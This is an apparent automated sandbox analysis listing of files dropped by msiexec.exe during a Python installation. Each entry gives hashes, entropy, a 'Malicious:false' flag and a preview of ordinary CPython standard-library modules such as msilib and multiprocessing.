                                                                                                                                SHA-256:2B2D1C145E1D2DC2C396932D8987FD8436B69B9EB6043DA9599915782728A7B8
                                                                                                                                SHA-512:0ADD87B555A0D39078D52F4C315700052934BD7854EF3E693FA6BBFBEB7B64E80EBDED257965FA30A60BB19C4E73C114F94A840A01698D5308047503C7D401C0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright (C) 2005 Martin v. L.wis..# Licensed to PSF under a Contributor Agreement...from _msi import *..import fnmatch..import os..import re..import string..import sys..import warnings....warnings._deprecated(__name__, remove=(3, 13))....AMD64 = "AMD64" in sys.version..# Keep msilib.Win64 around to preserve backwards compatibility...Win64 = AMD64....# Partially taken from Wine..datasizemask= 0x00ff..type_valid= 0x0100..type_localizable= 0x0200....typemask= 0x0c00..type_long= 0x0000..type_short= 0x0400..type_string= 0x0c00..type_binary= 0x0800....type_nullable= 0x1000..type_key= 0x2000..# XXX temporary, localizable?..knownbits = datasizemask | type_valid | type_localizable | \.. typemask | type_nullable | type_key....class Table:.. def __init__(self, name):.. self.name = name.. self.fields = [].... def add_field(self, index, name, type):.. self.fields.append((index,name,type))....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with very long lines (1078), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):82586
                                                                                                                                Entropy (8bit):5.022105436613017
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:yAvOnCKdyOXpBx0fzf2OCSRe28nuY+rZo5vubuRFNJazMC/L6MNiAWP4gb7928qT:y32fzf2OCSRPZLiNBqg1SpBK2r474oCT
                                                                                                                                MD5:557AB5894790ED2978DE5C9D9137395C
                                                                                                                                SHA1:8EA2B11505830309EA1EB45B05688932CC8CF9C6
                                                                                                                                SHA-256:FBF82845488BBE29FB0D4FC5568DEF6333F35BE025ADA802BEC86D56D184AF2F
                                                                                                                                SHA-512:C78EF38C9A8CA4EBF021E4B86DE70375A01BA86986EB0CE015FF4DA0A01BC04B2454DAB95CCB02D2C6BFA49DF2E5CEAAC60001C866F0B6CED49E0A8D7299A0ED
                                                                                                                                Malicious:false
                                                                                                                                Preview:from . import Table...._Validation = Table('_Validation').._Validation.add_field(1,'Table',11552).._Validation.add_field(2,'Column',11552).._Validation.add_field(3,'Nullable',3332).._Validation.add_field(4,'MinValue',4356).._Validation.add_field(5,'MaxValue',4356).._Validation.add_field(6,'KeyTable',7679).._Validation.add_field(7,'KeyColumn',5378).._Validation.add_field(8,'Category',7456).._Validation.add_field(9,'Set',7679).._Validation.add_field(10,'Description',7679)....ActionText = Table('ActionText')..ActionText.add_field(1,'Action',11592)..ActionText.add_field(2,'Description',7936)..ActionText.add_field(3,'Template',7936)....AdminExecuteSequence = Table('AdminExecuteSequence')..AdminExecuteSequence.add_field(1,'Action',11592)..AdminExecuteSequence.add_field(2,'Condition',7679)..AdminExecuteSequence.add_field(3,'Sequence',5378)....Condition = Table('Condition')..Condition.add_field(1,'Feature_',11558)..Condition.add_field(2,'Level',9474)..Condition.add_field(3,'Condition',7679)...
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4055
                                                                                                                                Entropy (8bit):5.065721725316051
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Whkk4gtqO5S++fpZsO5S++f1ZUxyAJnVKf/G2+iu0resy1GHQUoen:WKkZtqKS++fpZsKS++fPUxyAJVKXGbid
                                                                                                                                MD5:A25C47A84A9C16D01AE25FD7CDF189A9
                                                                                                                                SHA1:4406DACFC4612D3E365256DC565A5B143DD0E999
                                                                                                                                SHA-256:674367D4838CA8ED301D55552C7ACD4F87397F2CF7F0DEBA6FB5C51C8ECA4155
                                                                                                                                SHA-512:CB3F9842729CA6B941AAC2C44305C1FD09F2547EDDFE200BCD583427AE3DFBA28E2345CD109CB9F097FCD330BD437865D6A1C7ACD5ADA52782216A43B51CEF53
                                                                                                                                Malicious:false
                                                                                                                                Preview:AdminExecuteSequence = [..('InstallInitialize', None, 1500),..('InstallFinalize', None, 6600),..('InstallFiles', None, 4000),..('InstallAdminPackage', None, 3900),..('FileCost', None, 900),..('CostInitialize', None, 800),..('CostFinalize', None, 1000),..('InstallValidate', None, 1400),..]....AdminUISequence = [..('FileCost', None, 900),..('CostInitialize', None, 800),..('CostFinalize', None, 1000),..('ExecuteAction', None, 1300),..('ExitDialog', None, -1),..('FatalError', None, -3),..('UserExit', None, -2),..]....AdvtExecuteSequence = [..('InstallInitialize', None, 1500),..('InstallFinalize', None, 6600),..('CostInitialize', None, 800),..('CostFinalize', None, 1000),..('InstallValidate', None, 1400),..('CreateShortcuts', None, 4500),..('MsiPublishAssemblies', None, 6250),..('PublishComponents', None, 6200),..('PublishFeatures', None, 6300),..('PublishProduct', None, 6400),..('RegisterClassInfo', None, 4600),..('RegisterExtensionInfo', None, 4700),..('RegisterMIMEInfo', None, 4900),..('
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9147
                                                                                                                                Entropy (8bit):5.039012355791682
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:7rOfYA/Lm1dxqQfQCqVcVWPLWvV1sg1p9Zz+TeqPnjAYxgIY0jcHB4z50GC17pnv:7rOI7p7
                                                                                                                                MD5:86CD362F8E1F0A9665781AD2B6690A74
                                                                                                                                SHA1:C49A38140AEC0BD9A3D317E40350AA2B53DEB234
                                                                                                                                SHA-256:0C6D03E02CC182BF912E1207F71080D8FE222C437B6B1A612CBFBB51A159CA35
                                                                                                                                SHA-512:599B48F2F6FC4532D382A9D75714884E40D5DFEF050EA83B66220442E511993CF5C6054860962920AFC4632B54FA6BD5C4AF33189216C2C5AB45800CFDD23A9A
                                                                                                                                Malicious:false
                                                                                                                                Preview:import msilib,os;dirname=os.path.dirname(__file__)....ActionText = [..('InstallValidate', 'Validating install', None),..('InstallFiles', 'Copying new files', 'File: [1], Directory: [9], Size: [6]'),..('InstallAdminPackage', 'Copying network install files', 'File: [1], Directory: [9], Size: [6]'),..('FileCost', 'Computing space requirements', None),..('CostInitialize', 'Computing space requirements', None),..('CostFinalize', 'Computing space requirements', None),..('CreateShortcuts', 'Creating shortcuts', 'Shortcut: [1]'),..('PublishComponents', 'Publishing Qualified Components', 'Component ID: [1], Qualifier: [2]'),..('PublishFeatures', 'Publishing Product Features', 'Feature: [1]'),..('PublishProduct', 'Publishing product information', None),..('RegisterClassInfo', 'Registering Class servers', 'Class Id: [1]'),..('RegisterExtensionInfo', 'Registering extension servers', 'Extension: [1]'),..('RegisterMIMEInfo', 'Registering MIME info', 'MIME Content Type: [1], Extension: [2]'),..('Re
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):953
                                                                                                                                Entropy (8bit):5.002152693521345
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:nD3PtHPztOkuDD6jNSSsKavFaEbxy3hBA8eB740nTViGy:DhYnexSSsKavFRFyx6B74Wvy
                                                                                                                                MD5:A5340549E96CE6140AFCBD4A4AB14D5E
                                                                                                                                SHA1:097B3F04B42ECC19E354261BA94FA56877DC75F3
                                                                                                                                SHA-256:8EDE1EECE1F33EE83F41D50149113271EDE6AE549451BD81A3480381D16A1965
                                                                                                                                SHA-512:7E3F00F9125BBD846D2EF7BB75825E7A0C4BB3D9F8DBF9E18017BC0D2A6F9A90B54827425A566C8ED84AD1333B9FF3B439F6977DD9106E6E6344D1E7231D7232
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Package analogous to 'threading.py' but using processes..#..# multiprocessing/__init__.py..#..# This package is intended to duplicate the functionality (and much of..# the API) of threading.py but uses processes instead of threads. A..# subpackage 'multiprocessing.dummy' has the same API but is a simple..# wrapper for 'threading'...#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....import sys..from . import context....#..# Copy stuff from default context..#....__all__ = [x for x in dir(context._default_context) if not x.startswith('_')]..globals().update((name, getattr(context._default_context, name)) for name in __all__)....#..# XXX These should not really be documented or public...#....SUBDEBUG = 5..SUBWARNING = 25....#..# Alias for main module -- will be reset by bootstrapping child processes..#....if '__main__' in sys.modules:.. sys.modules['__mp_main__'] = sys.modules['__main__']..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32575
                                                                                                                                Entropy (8bit):4.502472457217306
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:xznMnW0xaiw3dws6QXyL9lUwQhGMqq0MKdFtmRQhhs82hl1JFTwf:xznMmZ2QCHMqq05dFs2hF2hl3FTwf
                                                                                                                                MD5:04300483CCA117882AFB7C8B4F084E45
                                                                                                                                SHA1:C4506DF741C4E4B750BB2441D9186B2BC1685FB4
                                                                                                                                SHA-256:6D8E7DDB0CA963552E9DC1F83AF401DD009C83925F18A74C4552E84A51B79E51
                                                                                                                                SHA-512:217A1EFFEBCA98744A13EB15FB656BB78AAD8CAB72369F0F75FCC4E9DD38FE330002A947EB48C4190B5639B31DDAAA7734FDECA589CE75B916B997B092A44A8F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# A higher level module for using sockets (or Windows named pipes)..#..# multiprocessing/connection.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = [ 'Client', 'Listener', 'Pipe', 'wait' ]....import io..import os..import sys..import socket..import struct..import time..import tempfile..import itertools....import _multiprocessing....from . import util....from . import AuthenticationError, BufferTooShort..from .context import reduction.._ForkingPickler = reduction.ForkingPickler....try:.. import _winapi.. from _winapi import WAIT_OBJECT_0, WAIT_ABANDONED_0, WAIT_TIMEOUT, INFINITE..except ImportError:.. if sys.platform == 'win32':.. raise.. _winapi = None....#..#..#....BUFSIZE = 8192..# A very generous timeout when it comes to local connections.....CONNECTION_TIMEOUT = 20....._mmap_counter = itertools.count()....default_family = 'AF_INET'..families = ['AF_INET']....if hasattr(socket, 'AF_UNIX'):.. defaul
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11973
                                                                                                                                Entropy (8bit):4.570071173951388
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:AC0nT6VNwzl9jjFaNqvr97H7Z7Z+rN6FD:AC0nu8H7xQw
                                                                                                                                MD5:6D69F6A7D04B3118A2D4DAD049FB5ED6
                                                                                                                                SHA1:08A12BB5A103F1C4A391F0F6A8CC800B9FCE0507
                                                                                                                                SHA-256:8788AD949FF4CF5CA5A545384FD0EEC9603AEB054A4C6E0C3756E873C9E2B6CE
                                                                                                                                SHA-512:54AE6523FF03075FEC8B85FAE93738AB0661C04A5E6645EB809E44DE27B733510BF83771829A917541DBEFD4BAE43A0F08CCF7F6F7C269E45E1A3FC036EFA289
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import sys..import threading....from . import process..from . import reduction....__all__ = ()....#..# Exceptions..#....class ProcessError(Exception):.. pass....class BufferTooShort(ProcessError):.. pass....class TimeoutError(ProcessError):.. pass....class AuthenticationError(ProcessError):.. pass....#..# Base type for contexts. Bound methods of an instance of this type are included in __all__ of __init__.py..#....class BaseContext(object):.... ProcessError = ProcessError.. BufferTooShort = BufferTooShort.. TimeoutError = TimeoutError.. AuthenticationError = AuthenticationError.... current_process = staticmethod(process.current_process).. parent_process = staticmethod(process.parent_process).. active_children = staticmethod(process.active_children).... def cpu_count(self):.. '''Returns the number of CPUs in the system'''.. num = os.cpu_count().. if num is None:.. raise NotImplementedError('cannot determine n
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3187
                                                                                                                                Entropy (8bit):4.773691666026923
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:gOaUD8iam5QHg6G9Rx+XD/uhbGw3+rYNvP9pAquqPtlIPITes:+s8Pk1/WD/Cb4cP93TllbTes
                                                                                                                                MD5:0C521B198A4BC36327E122DDE5CAD0B0
                                                                                                                                SHA1:15D56DCFFDCB1E515870803158CDD5C7E02B2E03
                                                                                                                                SHA-256:D6958460A9ACAE3D80CCBAFAA8F84AEF55D51312AE102BAB4861411212F1FCEE
                                                                                                                                SHA-512:B02DF1F0FAA7B9DCF9C72BD1A7B522C4AD363EA3FF16888AE8E6E870A2A354D8934175E72CDC86CAB7956ADB03D7393985C125204AAE94F804D526CA65349380
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Support for the API of the multiprocessing package using threads..#..# multiprocessing/dummy/__init__.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = [.. 'Process', 'current_process', 'active_children', 'freeze_support',.. 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition',.. 'Event', 'Barrier', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue'.. ]....#..# Imports..#....import threading..import sys..import weakref..import array....from .connection import Pipe..from threading import Lock, RLock, Semaphore, BoundedSemaphore..from threading import Event, Condition, Barrier..from queue import Queue....#..#..#....class DummyProcess(threading.Thread):.... def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):.. threading.Thread.__init__(self, group, target, name, args, kwargs).. self._pid = None.. self._children = weakref.WeakKeyDictionary().. self._
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1673
                                                                                                                                Entropy (8bit):4.642811205034422
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zGaWalumLAlOPWZ2p2kxSb17IryqB/pmmWa:Qal5w3kxM17SfB/pZ
                                                                                                                                MD5:3C93E4CDCE761DB183CC4FE537612611
                                                                                                                                SHA1:AC7A636C992937C4DB172032E167432FB372614B
                                                                                                                                SHA-256:FC1154AFDE7815BAA6DA7738498C26B07C07A02EEB908B86D2EEC10731E3F4C1
                                                                                                                                SHA-512:880FAE4801FB678E7225FCA7BE43F09E0C134305A3D77A095C92ABBB9793568E43D19259576CAA4DF9C5BD0F406B5003C39BC97BCA9F38F4C5493203E4AB9B7F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Analogue of `multiprocessing.connection` which uses queues instead of sockets..#..# multiprocessing/dummy/connection.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = [ 'Client', 'Listener', 'Pipe' ]....from queue import Queue......families = [None]......class Listener(object):.... def __init__(self, address=None, family=None, backlog=1):.. self._backlog_queue = Queue(backlog).... def accept(self):.. return Connection(*self._backlog_queue.get()).... def close(self):.. self._backlog_queue = None.... @property.. def address(self):.. return self._backlog_queue.... def __enter__(self):.. return self.... def __exit__(self, exc_type, exc_value, exc_tb):.. self.close()......def Client(address):.. _in, _out = Queue(), Queue().. address.put((_out, _in)).. return Connection(_in, _out)......def Pipe(duplex=True):.. a, b = Queue(), Queue().. return Connecti
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12490
                                                                                                                                Entropy (8bit):4.102546902940614
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:GRx2w1AT/MZcO5VbPbNAw+6SfEn/nENUuhNWQgwKXx6fmhRnv2GU4ryW:GkqEYwqzv
                                                                                                                                MD5:FFD8A29E6C96570BB6CE0CA09F4CFCC6
                                                                                                                                SHA1:1163E7E95E8E8ED1299D057EFE65EECA369706B4
                                                                                                                                SHA-256:0D0DBE1C2088EF9D45E42AFBB39249801270A61769BB54EF13ED418939334564
                                                                                                                                SHA-512:6A1F1CA75E6745A40C40F5009346DE0DFF6C0E9AC46251D16C8123713F8596F136B99B0975F9D62FB91D23C2A3B65222DB10EF0D230233A2C624A23DB81F3555
                                                                                                                                Malicious:false
                                                                                                                                Preview:import errno..import os..import selectors..import signal..import socket..import struct..import sys..import threading..import warnings....from . import connection..from . import process..from .context import reduction..from . import resource_tracker..from . import spawn..from . import util....__all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process',.. 'set_forkserver_preload']....#..#..#....MAXFDS_TO_SEND = 256..SIGNED_STRUCT = struct.Struct('q') # large enough for pid_t....#..# Forkserver class..#....class ForkServer(object):.... def __init__(self):.. self._forkserver_address = None.. self._forkserver_alive_fd = None.. self._forkserver_pid = None.. self._inherited_fds = None.. self._lock = threading.Lock().. self._preload_modules = ['__main__'].... def _stop(self):.. # Method used by unit tests to stop the server.. with self._lock:.. self._stop_unlocked().... def _stop_unlocked(s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11963
                                                                                                                                Entropy (8bit):4.474283974297122
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:SCzlXK1tk+4QjUrB/n5sW0fsr2rBwqkiaXPc0UmBoPuxwHZ3Ei/E3/vundd7jUxF:SCRU0QjSBxOFwqkiaXPc0UmmPuw0iAv7
                                                                                                                                MD5:EA49FFA8DF01C39C225C3BCBD64017E0
                                                                                                                                SHA1:D2FFBABB470F73E94C486E2A8734F6FFF36613DE
                                                                                                                                SHA-256:6DFF70E88DC22167D78039E656567A3BC3FE350B099FA383EEF8F9E9D31187AA
                                                                                                                                SHA-512:FB7D0AB630734657038962115D828E30D620ADF3C2374D63D2FA3C7EB5BB3D7D2CD7AC8D59E0EC9ACF7A42675933EE8C61A24251ECFD9293679FAA0BDEAAA893
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module which supports allocation of memory from an mmap..#..# multiprocessing/heap.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....import bisect..from collections import defaultdict..import mmap..import os..import sys..import tempfile..import threading....from .context import reduction, assert_spawning..from . import util....__all__ = ['BufferWrapper']....#..# Inheritable class which wraps an mmap, and from which blocks can be allocated..#....if sys.platform == 'win32':.... import _winapi.... class Arena(object):.. """.. A shared memory area backed by anonymous memory (Windows)... """.... _rand = tempfile._RandomNameSequence().... def __init__(self, size):.. self.size = size.. for i in range(100):.. name = 'pym-%d-%s' % (os.getpid(), next(self._rand)).. buf = mmap.mmap(-1, size, tagname=name).. if _winapi.GetLastError() ==
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49064
                                                                                                                                Entropy (8bit):4.503292532361165
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:6qn5Ohd886H9X+YXTWEYQs2DpL7zkEoXySNlVyLAdy3/:nn5o6VsEoiGlVNdy3/
                                                                                                                                MD5:D6579B68DB41AC7AABE154195D845F47
                                                                                                                                SHA1:95AADECC8AC2703321D806B9A72474F151109A65
                                                                                                                                SHA-256:9CCC7C3B62BF8945CA7985892C9ED5AE016A7890B16089583803AABCCEAB51B2
                                                                                                                                SHA-512:EEDD78368C3F765E62CEFFF48461C8747CFCF92F6BA5E35F5961ACB8DF64EB0AA190F5731190D22D184E8FF5F96BF9F4B21875B09E69D8A3389939F1C04AB343
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module providing manager classes for dealing..# with shared objects..#..# multiprocessing/managers.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]....#..# Imports..#....import sys..import threading..import signal..import array..import queue..import time..import types..import os..from os import getpid....from traceback import format_exc....from . import connection..from .context import reduction, get_spawning_popen, ProcessError..from . import pool..from . import process..from . import util..from . import get_context..try:.. from . import shared_memory..except ImportError:.. HAS_SHMEM = False..else:.. HAS_SHMEM = True.. __all__.append('SharedMemoryManager')....#..# Register some things for pickling..#....def reduce_array(a):.. return array.array, (a.typecode, a.tobytes())..reduction.register(array.array, reduce_array)....view_types = [type(getattr({},
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33716
                                                                                                                                Entropy (8bit):4.330955874546046
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:N9SrNk7vKmuqycIvc8mgttpsRaU3XGWugFVaBSl2DZFnCN:N9iNk7Ov3mRaAXGWug7gSl2DZB+
                                                                                                                                MD5:0937C389E4EB38AC628F17A6774A77C8
                                                                                                                                SHA1:DBFA75F82495C10DAB31FA8B064AE05EBCCED949
                                                                                                                                SHA-256:F48326A619B15338BF3BD66EEC63318A203106F798831471734C21DC57277C3B
                                                                                                                                SHA-512:AEB0D9655EC86C0085FF7644662F15E2AAF8661EC895575534DA67F79AB7D2FDF8FFEC8B6371DE269937A8B604B7CA8D15BA88310DC42B2DCA3627098ABDB599
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module providing the `Pool` class for managing a process pool..#..# multiprocessing/pool.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = ['Pool', 'ThreadPool']....#..# Imports..#....import collections..import itertools..import os..import queue..import threading..import time..import traceback..import types..import warnings....# If threading is available then ThreadPool should be provided. Therefore..# we avoid top-level imports which are liable to fail on some systems...from . import util..from . import get_context, TimeoutError..from .connection import wait....#..# Constants representing the state of a pool..#....INIT = "INIT"..RUN = "RUN"..CLOSE = "CLOSE"..TERMINATE = "TERMINATE"....#..# Miscellaneous..#....job_counter = itertools.count()....def mapstar(args):.. return list(map(*args))....def starmapstar(args):.. return list(itertools.starmap(args[0], args[1]))....#..# Hack to embed stringification of remote tra
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2460
                                                                                                                                Entropy (8bit):4.182180405304907
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:QZGF2RvrrYNYMeOUIZ2I8Fwm4IRBhj23aVmMiZn12/1NCv:gGoRvrrYpzduSyi3ag12NNCv
                                                                                                                                MD5:3606E62F03A79722318311A8FCE9F670
                                                                                                                                SHA1:8C3D2DB16A740A8F460387E91171FD23371BD741
                                                                                                                                SHA-256:D7CF3E6019F6F74C305DFC103FF5B69BFBDC5EE546945D483C2380572E17AF49
                                                                                                                                SHA-512:D3D4E4CB3056383EBFC8636FFC8B698542A394C73F9D1ECD328CEBEC90CA7BF401D290B89CC5FED8A2E4FD8FADFC6B019E6E7C08E4E716DEAD3715022C9A9243
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import signal....from . import util....__all__ = ['Popen']....#..# Start child process using fork..#....class Popen(object):.. method = 'fork'.... def __init__(self, process_obj):.. util._flush_std_streams().. self.returncode = None.. self.finalizer = None.. self._launch(process_obj).... def duplicate_for_child(self, fd):.. return fd.... def poll(self, flag=os.WNOHANG):.. if self.returncode is None:.. try:.. pid, sts = os.waitpid(self.pid, flag).. except OSError:.. # Child process not yet created. See #1731717.. # e.errno == errno.ECHILD == 10.. return None.. if pid == self.pid:.. self.returncode = os.waitstatus_to_exitcode(sts).. return self.returncode.... def wait(self, timeout=None):.. if self.returncode is None:.. if timeout is not None:.. from multiprocessing.connectio
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2304
                                                                                                                                Entropy (8bit):4.489759414225819
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:4KaTwIFIUJZGF7JVSDCqrOYeq6nSrtQXQYSu6J/nmbLxw+LK8s:48qI6GZJVSnrqBSrGAYkcGiK9
                                                                                                                                MD5:BE326FC3D03F6AD40F70A313E65F0D00
                                                                                                                                SHA1:90E79F5AD8F23A63070E788E72FA7BAE2DFA935E
                                                                                                                                SHA-256:101B13A3880C6EEE2B25675CD3BA318AF5AEA0ED2B3AA66C2FFDD3E4633E363D
                                                                                                                                SHA-512:2616D841B9E86FFD05EE79DCDA5405E42DCD1E8D55591AAA940A4BBB2F3EB3B61D1BD6806EB414C310A635AA47C3E08276559A33C1F7006A9F78262DD6AB349C
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io..import os....from .context import reduction, set_spawning_popen..if not reduction.HAVE_SEND_HANDLE:.. raise ImportError('No support for sending fds between processes')..from . import forkserver..from . import popen_fork..from . import spawn..from . import util......__all__ = ['Popen']....#..# Wrapper for an fd used while launching a process..#....class _DupFd(object):.. def __init__(self, ind):.. self.ind = ind.. def detach(self):.. return forkserver.get_inherited_fds()[self.ind]....#..# Start child process using a server process..#....class Popen(popen_fork.Popen):.. method = 'forkserver'.. DupFd = _DupFd.... def __init__(self, process_obj):.. self._fds = [].. super().__init__(process_obj).... def duplicate_for_child(self, fd):.. self._fds.append(fd).. return len(self._fds) - 1.... def _launch(self, process_obj):.. prep_data = spawn.get_preparation_data(process_obj._name).. buf = io.BytesIO()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2101
                                                                                                                                Entropy (8bit):4.263961751670647
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:4KDIUJZGF2wVShxIrOYKr96npBZkW+m5ahY5P:4UI6GowVSjIr+rYpBZHuY5P
                                                                                                                                MD5:7764E6C4815A832C92EA7CDD242D64DD
                                                                                                                                SHA1:CED80D0788A2AFD9E3D10E89B3867FC3BFD0977C
                                                                                                                                SHA-256:E04A50C8627EF4B8531395A56F0755B27BF91D9BA634A570DC566DFD85EAE830
                                                                                                                                SHA-512:4D03309911E89C03812F781C5CAA5308A4E523529D7A6354B7E4678D33C08C646D49DC8F19C6CB059624A5A5DC23074E6C386692C8354391B0A5056C4E8D8B93
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io..import os....from .context import reduction, set_spawning_popen..from . import popen_fork..from . import spawn..from . import util....__all__ = ['Popen']......#..# Wrapper for an fd used while launching a process..#....class _DupFd(object):.. def __init__(self, fd):.. self.fd = fd.. def detach(self):.. return self.fd....#..# Start child process using a fresh interpreter..#....class Popen(popen_fork.Popen):.. method = 'spawn'.. DupFd = _DupFd.... def __init__(self, process_obj):.. self._fds = [].. super().__init__(process_obj).... def duplicate_for_child(self, fd):.. self._fds.append(fd).. return fd.... def _launch(self, process_obj):.. from . import resource_tracker.. tracker_fd = resource_tracker.getfd().. self._fds.append(tracker_fd).. prep_data = spawn.get_preparation_data(process_obj._name).. fp = io.BytesIO().. set_spawning_popen(self).. try:.. redu
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4153
                                                                                                                                Entropy (8bit):4.484805221286897
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:jH36GocK6eAKVGvN5jrBojvDwpYvToRK0GRCawuRd6qkPKyRF7C:jfo16/KVGLP8vDMRK0vuRrkPT7C
                                                                                                                                MD5:E0C11A255D5C2FEFD8261E27161FD36B
                                                                                                                                SHA1:60FFE11CCCD72EC6DE1F9BE7980F7666EACC31BE
                                                                                                                                SHA-256:06F484137693F711E3E5D260A8E74DE69055A4A833ED53DFC263A6A25D8F23C6
                                                                                                                                SHA-512:3286590E94CF711E8A47EA840FEE4605AEBFE664AD622A1E37C087A7248D0A1A550F32EE6C9853ADFBE8A757F589E401A248EAD9DC26C38135EE2EDB19CD3D30
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import msvcrt..import signal..import sys..import _winapi....from .context import reduction, get_spawning_popen, set_spawning_popen..from . import spawn..from . import util....__all__ = ['Popen']....#..#..#....TERMINATE = 0x10000..WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False))..WINSERVICE = sys.executable.lower().endswith("pythonservice.exe")......def _path_eq(p1, p2):.. return p1 == p2 or os.path.normcase(p1) == os.path.normcase(p2)....WINENV = not _path_eq(sys.executable, sys._base_executable)......def _close_handles(*handles):.. for handle in handles:.. _winapi.CloseHandle(handle)......#..# We define a Popen class similar to the one from subprocess, but..# whose constructor takes a process object as its argument...#....class Popen(object):.. '''.. Start a subprocess to run the code of a process object.. '''.. method = 'spawn'.... def __init__(self, process_obj):.. prep_data = spawn.get_preparation_data(process_obj._n
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12545
                                                                                                                                Entropy (8bit):4.378509224333696
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:t2KCseRVTRtEbZT6tv5n9/NE/r9s2pPxy0KZPw2MgtFv3MY71:t2KyfA6t097poVZ
                                                                                                                                MD5:EC7AFCD24CF3F9BF722D1B1505A8CF7D
                                                                                                                                SHA1:AE30185D8783B7FB2B521ADCCB63A5DFECB71CA2
